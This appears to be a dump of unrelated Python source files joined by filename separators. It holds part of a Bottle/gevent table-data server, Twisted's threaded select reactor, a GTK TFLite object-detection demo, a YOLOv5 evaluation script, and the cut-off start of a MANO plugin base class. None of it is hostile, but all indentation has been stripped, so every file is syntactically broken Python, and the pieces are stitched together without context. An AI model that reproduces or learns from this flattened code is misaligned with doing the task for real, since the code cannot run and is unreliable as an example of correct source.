# . 'rows' : a list, of len = number of rows, and each entry is a list of values in one row
# 'series A': [{
# "columns":[
# {"text":"Time","type":"time"},
# {"text":"Country","type":"string"},
# {"text":"Number","type":"number"}
# ],
# "rows":[
# [1234567,"SE",123],
# [1234567,"DE",231],
# [1234567,"US",321]
# ],
# "type":"table"
# }],
# body = json_dumps(tabular_data[series])
time_col = ""
if "time_column" in fullquery:
tmp = fullquery["time_column"].strip()
if len(tmp) > 0:
time_col = tmp
if time_col in columns_from_to:
time_col = columns_from_to[time_col]
df = revise_time_column(time_col, df)
mdict = {}
# mdict["columns"] = [
# {"text":"user_agent","type":"string"},
# {"text":"Time","type":"time"},
# {"text":"value","type":"number"}
# ]
# TableData
mdict["columns"] = []
y = build_table_schema(df)
for col in y["fields"]:
if col["name"] == "index":
continue
x = {}
x["text"] = col["name"]
stype = ""
if col["type"] in ["integer", "number"]:
stype = "number"
elif col["type"] in ["datetime"] or col["name"] == time_col:
stype = "time"
elif col["type"] in ["string"]:
stype = "string"
elif col["type"] in ["boolean"]:
stype = "boolean"
else:
print("col: ", col["type"])
logger.info("col: ", col["type"])
assert 0
x["type"] = stype
mdict["columns"].append(x)
mdict["rows"] = df.values.tolist()
result = mdict
if DEBUG:
logger.debug("=====")
logger.debug(".. print first 5 rows")
# don't print too long result
import pprint
print(type(result))
print(result)
pprint.pprint(result["columns"], width=1)
pprint.pprint(len(result["rows"]))
# pprint.pprint(result['rows'][1:5], width=1, depth=1)
return result, None
if __name__ == "__main__":
# run(app=app, host='localhost', port=18081,debug=True)
# run(app=app, host='localhost', port=18081, server='gevent')
if cmd_args.ssl is False:
run(app=app, host="0.0.0.0", port=18081, server="gevent")
else:
run(
app=app,
host="0.0.0.0",
port=18081,
server="gevent",
certfile="cert.pem",
keyfile="key.pem",
)
# run(app=app, host='0.0.0.0', port=18081, server='sslwebserver') # asynchronous I/O
# run(app=app, host='0.0.0.0', port=18081, server='wsgiref', reloader=True) # single-threaded
# run(app=app, host='0.0.0.0', port=18081, server='wsgiref') # single-threaded
|
_threadedselect.py | # -*- test-case-name: twisted.test.test_internet -*-
# $Id: default.py,v 1.90 2004/01/06 22:35:22 warner Exp $
#
# Copyright (c) 2001-2004 Twisted Matrix Laboratories.
# See LICENSE for details.
from __future__ import generators
"""Threaded select reactor
API Stability: unstable
Maintainer: U{Bob Ippolito<mailto:bob@redivi.com>}
The threadedselectreactor is a specialized reactor for integrating with
arbitrary foreign event loop, such as those you find in GUI toolkits.
There are three things you'll need to do to use this reactor.
Install the reactor at the beginning of your program, before importing
the rest of Twisted::
| from twisted.internet import _threadedselect
| _threadedselect.install()
Interleave this reactor with your foreign event loop, at some point after
your event loop is initialized::
| from twisted.internet import reactor
| reactor.interleave(foreignEventLoopWakerFunction)
| self.addSystemEventTrigger('after', 'shutdown', foreignEventLoopStop)
Instead of shutting down the foreign event loop directly, shut down the
reactor::
| from twisted.internet import reactor
| reactor.stop()
In order for Twisted to do its work in the main thread (the thread that
interleave is called from), a waker function is necessary. The waker function
will be called from a "background" thread with one argument: func.
The waker function's purpose is to call func() from the main thread.
Many GUI toolkits ship with appropriate waker functions.
Some examples of this are wxPython's wx.callAfter (may be wxCallAfter in
older versions of wxPython) or PyObjC's PyObjCTools.AppHelper.callAfter.
These would be used in place of "foreignEventLoopWakerFunction" in the above
example.
The other integration point at which the foreign event loop and this reactor
must integrate is shutdown. In order to ensure clean shutdown of Twisted,
you must allow for Twisted to come to a complete stop before quitting the
application. Typically, you will do this by setting up an after shutdown
trigger to stop your foreign event loop, and call reactor.stop() where you
would normally have initiated the shutdown procedure for the foreign event
loop. Shutdown functions that could be used in place of
"foreignEventloopStop" would be the ExitMainLoop method of the wxApp instance
with wxPython, or the PyObjCTools.AppHelper.stopEventLoop function.
"""
from threading import Thread
from Queue import Queue, Empty
from time import sleep
import sys
from zope.interface import implements
from twisted.internet.interfaces import IReactorFDSet
from twisted.internet import error
from twisted.internet import posixbase
from twisted.python import log, failure, threadable
from twisted.persisted import styles
from twisted.python.runtime import platformType
import select
from errno import EINTR, EBADF
from twisted.internet.selectreactor import _select
# Exceptions that doSelect might return frequently
_NO_FILENO = error.ConnectionFdescWentAway('Handler has no fileno method')
_NO_FILEDESC = error.ConnectionFdescWentAway('Filedescriptor went away')
def dictRemove(dct, value):
try:
del dct[value]
except KeyError:
pass
def raiseException(e):
raise e
class ThreadedSelectReactor(posixbase.PosixReactorBase):
"""A threaded select() based reactor - runs on all POSIX platforms and on
Win32.
"""
implements(IReactorFDSet)
def __init__(self):
threadable.init(1)
self.reads = {}
self.writes = {}
self.toThreadQueue = Queue()
self.toMainThread = Queue()
self.workerThread = None
self.mainWaker = None
posixbase.PosixReactorBase.__init__(self)
self.addSystemEventTrigger('after', 'shutdown', self._mainLoopShutdown)
def wakeUp(self):
# we want to wake up from any thread
self.waker.wakeUp()
def callLater(self, *args, **kw):
tple = posixbase.PosixReactorBase.callLater(self, *args, **kw)
self.wakeUp()
return tple
def _sendToMain(self, msg, *args):
#print >>sys.stderr, 'sendToMain', msg, args
self.toMainThread.put((msg, args))
if self.mainWaker is not None:
self.mainWaker()
def _sendToThread(self, fn, *args):
#print >>sys.stderr, 'sendToThread', fn, args
self.toThreadQueue.put((fn, args))
def _preenDescriptorsInThread(self):
log.msg("Malformed file descriptor found. Preening lists.")
readers = self.reads.keys()
writers = self.writes.keys()
self.reads.clear()
self.writes.clear()
for selDict, selList in ((self.reads, readers), (self.writes, writers)):
for selectable in selList:
try:
select.select([selectable], [selectable], [selectable], 0)
except:
log.msg("bad descriptor %s" % selectable)
else:
selDict[selectable] = 1
def _workerInThread(self):
try:
while 1:
fn, args = self.toThreadQueue.get()
#print >>sys.stderr, "worker got", fn, args
fn(*args)
except SystemExit:
pass # exception indicates this thread should exit
except:
f = failure.Failure()
self._sendToMain('Failure', f)
#print >>sys.stderr, "worker finished"
def _doSelectInThread(self, timeout):
"""Run one iteration of the I/O monitor loop.
This will run all selectables who had input or output readiness
waiting for them.
"""
reads = self.reads
writes = self.writes
while 1:
try:
r, w, ignored = _select(reads.keys(),
writes.keys(),
[], timeout)
break
except ValueError, ve:
# Possibly a file descriptor has gone negative?
log.err()
self._preenDescriptorsInThread()
except TypeError, te:
# Something *totally* invalid (object w/o fileno, non-integral
# result) was passed
log.err()
self._preenDescriptorsInThread()
except (select.error, IOError), se:
# select(2) encountered an error
if se.args[0] in (0, 2):
# windows does this if it got an empty list
if (not reads) and (not writes):
return
else:
raise
elif se.args[0] == EINTR:
return
elif se.args[0] == EBADF:
self._preenDescriptorsInThread()
else:
# OK, I really don't know what's going on. Blow up.
raise
self._sendToMain('Notify', r, w)
def _process_Notify(self, r, w):
#print >>sys.stderr, "_process_Notify"
reads = self.reads
writes = self.writes
_drdw = self._doReadOrWrite
_logrun = log.callWithLogger
for selectables, method, dct in ((r, "doRead", reads), (w, "doWrite", writes)):
for selectable in selectables:
# if this was disconnected in another thread, kill it.
if selectable not in dct:
continue
# This for pausing input when we're not ready for more.
_logrun(selectable, _drdw, selectable, method, dct)
#print >>sys.stderr, "done _process_Notify"
def _process_Failure(self, f):
f.raiseException()
_doIterationInThread = _doSelectInThread
def ensureWorkerThread(self):
if self.workerThread is None or not self.workerThread.isAlive():
self.workerThread = Thread(target=self._workerInThread)
self.workerThread.start()
def doThreadIteration(self, timeout):
self._sendToThread(self._doIterationInThread, timeout)
self.ensureWorkerThread()
#print >>sys.stderr, 'getting...'
msg, args = self.toMainThread.get()
#print >>sys.stderr, 'got', msg, args
getattr(self, '_process_' + msg)(*args)
doIteration = doThreadIteration
def _interleave(self):
while self.running:
#print >>sys.stderr, "runUntilCurrent"
self.runUntilCurrent()
t2 = self.timeout()
t = self.running and t2
self._sendToThread(self._doIterationInThread, t)
#print >>sys.stderr, "yielding"
yield None
#print >>sys.stderr, "fetching"
msg, args = self.toMainThread.get_nowait()
getattr(self, '_process_' + msg)(*args)
def interleave(self, waker, *args, **kw):
"""
interleave(waker) interleaves this reactor with the
current application by moving the blocking parts of
the reactor (select() in this case) to a separate
thread. This is typically useful for integration with
GUI applications which have their own event loop
already running.
See the module docstring for more information.
"""
self.startRunning(*args, **kw)
loop = self._interleave()
def mainWaker(waker=waker, loop=loop):
#print >>sys.stderr, "mainWaker()"
waker(loop.next)
self.mainWaker = mainWaker
loop.next()
self.ensureWorkerThread()
def _mainLoopShutdown(self):
self.mainWaker = None
if self.workerThread is not None:
#print >>sys.stderr, 'getting...'
self._sendToThread(raiseException, SystemExit)
self.wakeUp()
try:
while 1:
msg, args = self.toMainThread.get_nowait()
#print >>sys.stderr, "ignored:", (msg, args)
except Empty:
pass
self.workerThread.join()
self.workerThread = None
try:
while 1:
fn, args = self.toThreadQueue.get_nowait()
if fn is self._doIterationInThread:
log.msg('Iteration is still in the thread queue!')
elif fn is raiseException and args[0] is SystemExit:
pass
else:
fn(*args)
except Empty:
pass
def _doReadOrWrite(self, selectable, method, dict):
try:
why = getattr(selectable, method)()
handfn = getattr(selectable, 'fileno', None)
if not handfn:
why = _NO_FILENO
elif handfn() == -1:
why = _NO_FILEDESC
except:
why = sys.exc_info()[1]
log.err()
if why:
self._disconnectSelectable(selectable, why, method == "doRead")
def addReader(self, reader):
"""Add a FileDescriptor for notification of data available to read.
"""
self._sendToThread(self.reads.__setitem__, reader, 1)
self.wakeUp()
def addWriter(self, writer):
"""Add a FileDescriptor for notification of data available to write.
"""
self._sendToThread(self.writes.__setitem__, writer, 1)
self.wakeUp()
def removeReader(self, reader):
"""Remove a Selectable for notification of data available to read.
"""
self._sendToThread(dictRemove, self.reads, reader)
def removeWriter(self, writer):
"""Remove a Selectable for notification of data available to write.
"""
self._sendToThread(dictRemove, self.writes, writer)
def removeAll(self):
return self._removeAll(self.reads, self.writes)
def run(self, installSignalHandlers=1):
self.startRunning(installSignalHandlers=installSignalHandlers)
self.mainLoop()
def mainLoop(self):
q = Queue()
self.interleave(q.put)
while self.running:
try:
q.get()()
except StopIteration:
break
def install():
"""Configure the twisted mainloop to be run using the select() reactor.
"""
reactor = ThreadedSelectReactor()
from twisted.internet.main import installReactor
installReactor(reactor)
return reactor
__all__ = ['install']
|
ui_detection.py | # Copyright 2021 Variscite LTD
# SPDX-License-Identifier: BSD-3-Clause
import cv2
import numpy as np
import threading
import gi
gi.require_versions({'GdkPixbuf': "2.0", 'Gtk': "3.0"})
from gi.repository.GdkPixbuf import Colorspace, Pixbuf
from gi.repository import GLib, Gtk
from pyvar.ml.engines.tflite import TFLiteInterpreter
from pyvar.ml.utils.framerate import Framerate
from pyvar.ml.utils.label import Label
from pyvar.ml.utils.overlay import Overlay
from pyvar.ml.utils.resizer import Resizer
from pyvar.ml.utils.retriever import FTP
from pyvar.multimedia.helper import Multimedia
SSD_LABELS_LIST = [
"person", "bicycle", "car", "motorcycle", "airplane", "bus", "train",
"truck", "boat", "traffic light", "fire hydrant", "stop sign",
"parking meter", "bench", "bird", "cat", "dog", "horse", "sheep", "cow",
"elephant", "bear", "zebra", "giraffe", "backpack", "umbrella", "handbag",
"tie", "suitcase", "frisbee", "skis", "snowboard", "sports ball", "kite",
"baseball bat", "baseball glove", "skateboard", "surfboard",
"tennis racket", "bottle", "wine glass", "cup", "fork", "knife", "spoon",
"bowl", "banana", "apple", "sandwich", "orange", "broccoli", "carrot",
"hot dog", "pizza", "donut", "cake", "chair", "couch", "potted plant",
"bed", "dining table", "toilet", "tv", "laptop", "mouse", "remote",
"keyboard", "cell phone", "microwave", "oven", "toaster", "sink",
"refrigerator", "book", "clock", "vase", "scissors", "teddy bear",
"hair drier", "toothbrush"]
class ObjectSelection(Gtk.Frame):
def __init__(self, parent, exclude_list):
super().__init__()
self.parent = parent
self.exclude_list = exclude_list
labels_list = self.exclude_list.copy()
labels_list.sort()
vertical_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
self.add(vertical_box)
scrolled_window = Gtk.ScrolledWindow()
horizontal_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
quit_button = Gtk.Button.new_with_label('Quit')
quit_button.connect('clicked', self.on_quit_button_clicked)
back_button = Gtk.Button.new_with_label('Back')
back_button.connect('clicked', self.on_back_button_clicked)
horizontal_box.pack_start(back_button, True, True, 10)
horizontal_box.pack_start(quit_button, True, True, 10)
vertical_box.pack_start(horizontal_box, False, True, 10)
vertical_box.pack_start(scrolled_window, True, True, 10)
vertical_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
scrolled_window.add(vertical_box)
for label in labels_list:
horizontal_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
switch_button = Gtk.Switch()
switch_button.set_active(False)
switch_button.connect('notify::active',
self.on_object_switch_activated, label)
label_name = Gtk.Label.new(label)
horizontal_box.pack_start(label_name, True, True, 100)
horizontal_box.pack_start(switch_button, False, True, 100)
vertical_box.pack_start(horizontal_box, True, True, 10)
def on_quit_button_clicked(self, button):
Gtk.main_quit()
def on_back_button_clicked(self, button):
self.parent.set_current_page(0)
def on_object_switch_activated(self, switch, gparam, obj):
if switch.get_active():
if obj in self.exclude_list:
self.exclude_list.remove(obj)
else:
if obj not in self.exclude_list:
self.exclude_list.append(obj)
class RealTimeDetection(Gtk.Frame):
def __init__(self, parent, exclude_list):
super().__init__()
self.parent = parent
self.exclude_list = exclude_list
self.model_file_path = None
self.label_file_path = None
ftp = FTP()
if ftp.retrieve_package(category="detection"):
self.model_file_path = ftp.model
self.label_file_path = ftp.label
labels = Label(self.label_file_path)
labels.read_labels("detection")
self.labels = labels.list
self.engine = None
self.interpreter = None
self.input_details = None
self.output_details = None
self.pixbuf = None
vertical_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
self.add(vertical_box)
horizontal_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
quit_button = Gtk.Button.new_with_label('Quit')
quit_button.connect('clicked', self.on_quit_button_clicked)
objects_button = Gtk.Button.new_with_label('Objects')
objects_button.connect('clicked', self.on_objects_button_clicked)
horizontal_box.pack_start(objects_button, True, True, 10)
horizontal_box.pack_start(quit_button, True, True, 10)
vertical_box.pack_start(horizontal_box, True, False, 10)
self.displayed_image = Gtk.Image()
image_box = Gtk.Box(spacing=5)
image_box.pack_start(self.displayed_image, True, True, 0)
vertical_box.pack_start(image_box, True, True, 5)
horizontal_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
inference_time_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
inference_label = Gtk.Label()
inference_label.set_markup('INFERENCE TIME:')
self.inference_value_label = Gtk.Label.new(None)
inference_time_box.pack_start(inference_label, False, True, 10)
inference_time_box.pack_start(self.inference_value_label, False, False, 10)
fps_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL)
fps_label = Gtk.Label()
fps_label.set_markup('FPS:')
self.fps_value_label = Gtk.Label.new(None)
fps_box.pack_start(fps_label, False, True, 10)
fps_box.pack_start(self.fps_value_label, False, False, 10)
horizontal_box.pack_start(inference_time_box, True, True, 10)
horizontal_box.pack_start(fps_box, True, True, 10)
vertical_box.pack_start(horizontal_box, True, False, 10)
self.start_interpreter()
self.run_application()
def on_quit_button_clicked(self, button):
Gtk.main_quit()
def on_objects_button_clicked(self, button):
self.parent.set_current_page(1)
def set_displayed_image(self, image):
image = cv2.resize(image, (420, 340))
image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR)
height, width = image.shape[:2]
arr = np.ndarray.tobytes(image)
self.pixbuf = Pixbuf.new_from_data(
arr, Colorspace.RGB, False, 8,
width, height, width*3, None, None)
self.displayed_image.set_from_pixbuf(self.pixbuf)
self.pixbuf = None
def run_application(self):
thread = threading.Thread(target=self.image_detection)
thread.daemon = True
thread.start()
def start_interpreter(self):
self.engine = TFLiteInterpreter(self.model_file_path)
def image_detection(self):
resizer = Resizer()
resizer.set_sizes(engine_input_details=self.engine.input_details)
camera = Multimedia("/dev/video1", resolution="vga")
camera.set_v4l2_config()
framerate = Framerate()
draw = Overlay()
draw.inference_time_info = False
draw.scores_info = True
draw.extra_info = False
draw.framerate_info = False
while camera.loop:
with framerate.fpsit():
frame = camera.get_frame()
resizer.resize_frame(frame)
self.engine.set_input(resizer.frame_resized)
self.engine.run_inference()
positions = self.engine.get_output(0, squeeze=True)
classes = self.engine.get_output(1, squeeze=True)
scores = self.engine.get_output(2, squeeze=True)
result = []
for idx, score in enumerate(scores):
if score > 0.5 and (self.labels[classes[idx]] not in self.exclude_list):
result.append({'pos': positions[idx], '_id': classes[idx]})
output_frame = draw.info(category="detection",
image=resizer.frame,
top_result=result,
labels=self.labels,
inference_time=None,
model_name=None,
source_file=camera.dev.name,
fps=None)
GLib.idle_add(self.inference_value_label.set_text,
f"{self.engine.inference_time}")
GLib.idle_add(self.fps_value_label.set_text,
f"{int(framerate.fps)}")
GLib.idle_add(self.set_displayed_image, output_frame)
class UserInterfaceDetectionExample(Gtk.Window):
def __init__(self):
super().__init__(title='User Interface Detection Example')
self.fullscreen()
exclude_list = SSD_LABELS_LIST.copy()
container = Gtk.Notebook()
container.set_show_tabs(False)
self.add(container)
realtime_page = RealTimeDetection(container, exclude_list)
container.append_page(realtime_page)
label_selection_page = ObjectSelection(container, exclude_list)
container.append_page(label_selection_page)
if __name__ == "__main__":
app = UserInterfaceDetectionExample()
app.connect('delete-event', Gtk.main_quit)
app.show_all()
Gtk.main()
|
test.py | import argparse
import glob
import json
import os
from pathlib import Path
from threading import Thread
import numpy as np
import torch
import yaml
from tqdm import tqdm
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, box_iou, \
non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path
from utils.loss import compute_loss
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import plot_images, output_to_target, plot_study_txt
from utils.torch_utils import select_device, time_synchronized
def test(data,
weights=None,
batch_size=32,
imgsz=640,
conf_thres=0.001,
iou_thres=0.6, # for NMS
save_json=False,
single_cls=False,
augment=False,
verbose=False,
model=None,
dataloader=None,
save_dir=Path(''), # for saving images
save_txt=False, # for auto-labelling
save_conf=False,
plots=True,
log_imgs=0): # number of logged images
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
set_logging()
device = select_device(opt.device, batch_size=batch_size)
save_txt = opt.save_txt # save *.txt labels
# Directories
save_dir = Path(increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok)) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Half
half = device.type != 'cpu' # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
is_coco = data.endswith('coco.yaml') # is COCO dataset
with open(data) as f:
data = yaml.load(f, Loader=yaml.FullLoader) # model dict
check_dataset(data) # check
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Logging
log_imgs, wandb = min(log_imgs, 100), None # ceil
try:
import wandb # Weights & Biases
except ImportError:
log_imgs = 0
# Dataloader
if not training:
img = torch.zeros((1, 3, imgsz, imgsz), device=device) # init img
_ = model(img.half() if half else img) if device.type != 'cpu' else None # run once
path = data['test'] if opt.task == 'test' else data['val'] # path to val/test images
dataloader = create_dataloader(path, imgsz, batch_size, model.stride.max(), opt, pad=0.5, rect=True)[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
coco91class = coco80_to_coco91_class()
s = ('%20s' + '%12s' * 6) % ('Class', 'Images', 'Targets', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t0, t1 = 0., 0., 0., 0., 0., 0., 0., 0., 0.
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class, wandb_images = [], [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
with torch.no_grad():
# Run model
t = time_synchronized()
inf_out, train_out = model(img, augment=augment) # inference and training outputs
t0 += time_synchronized() - t
# Compute loss
if training:
loss += compute_loss([x.float() for x in train_out], targets, model)[1][:3] # box, obj, cls
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_txt else [] # for autolabelling
t = time_synchronized()
output = non_max_suppression(inf_out, conf_thres=conf_thres, iou_thres=iou_thres, labels=lb)
t1 += time_synchronized() - t
# Statistics per image
for si, pred in enumerate(output):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path = Path(paths[si])
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1]) # native-space pred
# Append to text file
if save_txt:
gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
# W&B logging
if plots and len(wandb_images) < log_imgs:
box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]},
"class_id": int(cls),
"box_caption": "%s %.3f" % (names[cls], conf),
"scores": {"class_score": conf},
"domain": "pixel"} for *xyxy, conf, cls in pred.tolist()]
boxes = {"predictions": {"box_data": box_data, "class_labels": names}} # inference-space
wandb_images.append(wandb.Image(img[si], boxes=boxes, caption=path.name))
# Append to pycocotools JSON dictionary
if save_json:
# [{"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}, ...
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(pred.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': coco91class[int(p[5])] if is_coco else int(p[5]),
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
# Assign all predictions as incorrect
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool, device=device)
if nl:
detected = [] # target indices
tcls_tensor = labels[:, 0]
# target boxes
tbox = xywh2xyxy(labels[:, 1:5])
scale_coords(img[si].shape[1:], tbox, shapes[si][0], shapes[si][1]) # native-space labels
if plots:
confusion_matrix.process_batch(pred, torch.cat((labels[:, 0:1], tbox), 1))
# Per target class
for cls in torch.unique(tcls_tensor):
ti = (cls == tcls_tensor).nonzero(as_tuple=False).view(-1) # prediction indices
pi = (cls == pred[:, 5]).nonzero(as_tuple=False).view(-1) # target indices
# Search for detections
if pi.shape[0]:
# Prediction to target ious
ious, i = box_iou(predn[pi, :4], tbox[ti]).max(1) # best ious, indices
# Append detections
detected_set = set()
for j in (ious > iouv[0]).nonzero(as_tuple=False):
d = ti[i[j]] # detected target
if d.item() not in detected_set:
detected_set.add(d.item())
detected.append(d)
correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn
if len(detected) == nl: # all targets already located in image
break
# Append statistics (correct, conf, pcls, tcls)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls))
# Plot images
if plots and batch_i < 3:
f = save_dir / f'test_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'test_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(output), paths, f, names), daemon=True).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
p, r, ap50, ap = p[:, 0], r[:, 0], ap[:, 0], ap.mean(1) # [P, R, AP@0.5, AP@0.5:0.95]
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%12.3g' * 6 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if verbose and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t0, t1, t0 + t1)) + (imgsz, imgsz, batch_size) # tuple
if not training:
print('Speed: %.1f/%.1f/%.1f ms inference/NMS/total per %gx%g image at batch-size %g' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
if wandb and wandb.run:
wandb.log({"Images": wandb_images})
wandb.log({"Validation": [wandb.Image(str(f), caption=f.name) for f in sorted(save_dir.glob('test*.jpg'))]})
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = glob.glob('../coco/annotations/instances_val*.json')[0] # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print('\nEvaluating pycocotools mAP... saving %s...' % pred_json)
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print('ERROR: pycocotools unable to run: %s' % e)
# Return results
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {save_dir}{s}")
model.float() # for training
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
if __name__ == '__main__':
parser = argparse.ArgumentParser(prog='test.py')
parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='*.data path')
parser.add_argument('--batch-size', type=int, default=32, help='size of each image batch')
parser.add_argument('--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='object confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='IOU threshold for NMS')
parser.add_argument('--task', default='val', help="'val', 'test', 'study'")
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a cocoapi-compatible JSON results file')
parser.add_argument('--project', default='runs/test', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
opt = parser.parse_args()
opt.save_json |= opt.data.endswith('coco.yaml')
opt.data = check_file(opt.data) # check file
print(opt)
if opt.task in ['val', 'test']: # run normally
test(opt.data,
opt.weights,
opt.batch_size,
opt.img_size,
opt.conf_thres,
opt.iou_thres,
opt.save_json,
opt.single_cls,
opt.augment,
opt.verbose,
save_txt=opt.save_txt,
save_conf=opt.save_conf,
)
elif opt.task == 'study': # run over a range of settings and save/plot
for weights in ['yolov5s.pt', 'yolov5m.pt', 'yolov5l.pt', 'yolov5x.pt']:
f = 'study_%s_%s.txt' % (Path(opt.data).stem, Path(weights).stem) # filename to save to
x = list(range(320, 800, 64)) # x axis
y = [] # y axis
for i in x: # img-size
print('\nRunning %s point %s...' % (f, i))
r, _, t = test(opt.data, weights, opt.batch_size, i, opt.conf_thres, opt.iou_thres, opt.save_json,
plots=False)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_study_txt(f, x) # plot
|
plugin.py | """
Created by Manuel Peuster <manuel@peuster.de>
Base class to simplify the implementation of new MANO plugins.
"""
import logging
import json
import time
import threading
from sonmanobase import messaging
logging.basicConfig(level=logging.INFO)
LOG = logging.getLogger("son-mano-base:plugin")
LOG.setLevel(logging.DEBUG)
class ManoBasePlugin(object):
"""
Abstract class that should be inherited by other MANO plugins.
This class provides basic mechanisms to
- connect to the broker
- send/receive async/sync request/response calls
- send/receive notifications
